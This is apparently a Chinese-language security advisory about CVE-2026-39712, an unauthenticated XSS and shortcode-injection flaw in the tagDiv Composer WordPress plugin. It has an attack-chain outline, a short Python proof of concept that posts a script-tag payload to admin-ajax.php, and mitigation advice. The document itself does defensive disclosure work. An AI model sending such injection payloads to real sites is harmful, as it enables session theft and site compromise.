IPBUF安全漏洞报告
English
CVE-2026-39712 CVSS 5.3 中危

CVE-2026-39712 tagDiv Composer代码注入漏洞

披露日期: 2026-04-08

漏洞信息

漏洞编号
CVE-2026-39712
漏洞类型
XSS / 代码注入
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
tagDiv Composer

相关标签

XSS代码注入WordPresstagDiv ComposerCVE-2026-39712Web安全

漏洞概述

tagDiv Composer插件在处理用户输入时存在过滤缺失,导致跨站脚本(XSS)及代码注入漏洞。由于无需认证即可利用,攻击者可构造恶意请求注入脚本,在受害者浏览器中执行,进而窃取凭证或结合WordPress机制执行任意短代码。

技术细节

该漏洞的根本原因是tagDiv Composer未能正确中和Web页面中的脚本相关HTML标签(CWE-79)。在受影响版本(<= 5.4.3)中,插件对特定参数或数据的输入验证存在缺陷。攻击者可以利用这一缺陷,通过发送特制的HTTP请求注入恶意的HTML/JavaScript代码或WordPress短代码。由于CVSS向量显示攻击复杂度低(AC:L)、无需用户权限(PR:N),这通常意味着存在一个无需登录的接口或者存在前台的注入点。当未经过滤的输入被服务器端处理并直接渲染在响应页面中时,恶意脚本便会在客户端上下文中执行。此外,参考Patchstack的信息,该漏洞可能导致任意短代码执行,这意味着攻击者可能利用WordPress的短代码机制进一步进行服务器端敏感操作。

攻击链分析

STEP 1
侦察
攻击者识别目标站点使用了tagDiv Composer插件,且版本低于或等于5.4.3。
STEP 2
漏洞利用
攻击者向存在漏洞的接口(如AJAX端点)发送特制的HTTP POST/GET请求,请求中包含未经过滤的恶意脚本标签或短代码。
STEP 3
代码执行
服务器端未对输入进行转义直接将其嵌入HTML响应中。当管理员或用户访问该页面时,恶意脚本在浏览器中执行,可能窃取Session ID或执行短代码导致的任意操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (replace with actual vulnerable endpoint) target_url = "http://example.com/wp-admin/admin-ajax.php" # Demonstrative payload injecting a script tag # Attackers may also inject malicious shortcodes depending on the context payload = { "action": "td_ajax_block", # Example action, actual parameter depends on version "td_atts": "<script>alert('CVE-2026-39712_XSS');</script>" } try: response = requests.post(target_url, data=payload) # Check if the payload is reflected in the response unsanitized if "CVE-2026-39712_XSS" in response.text and "<script>" in response.text: print("[+] Vulnerability confirmed: XSS payload reflected successfully.") else: print("[-] Vulnerability not detected or payload sanitized.") except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

tagDiv Composer <= 5.4.3

防御指南

临时缓解措施
建议立即检查并更新tagDiv Composer插件至最新安全版本。在无法立即升级的情况下,应限制对插件相关目录和接口的公网访问,并配置WAF规则过滤包含<script>、onerror等高危字符的请求流量,以降低被攻击风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表